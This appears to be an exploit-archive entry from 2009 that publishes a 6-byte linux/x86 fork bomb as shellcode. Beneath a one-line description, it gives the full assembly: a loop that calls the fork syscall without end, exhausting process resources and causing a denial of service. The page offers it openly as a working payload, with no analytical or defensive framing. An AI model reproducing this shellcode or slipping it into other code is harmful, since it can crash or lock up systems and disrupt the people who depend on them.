[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : linux/x86 fork bomb 6 bytes
# Published : 2009-12-30
# Author : root@thegibson
# Previous Title : linux/x86 break chroot 79 bytes
# Next Title : win32/xp sp2 (En + Ar) cmd.exe 23 bytes


Smallest fork bomb shellcode I could make.


; linux/x86 fork bomb 6 bytes
; root@thegibson
; 2009-12-30

section .text
	global _start

_start:
	; fork()
	mov al, 2
	int 0x80
	jmp short _start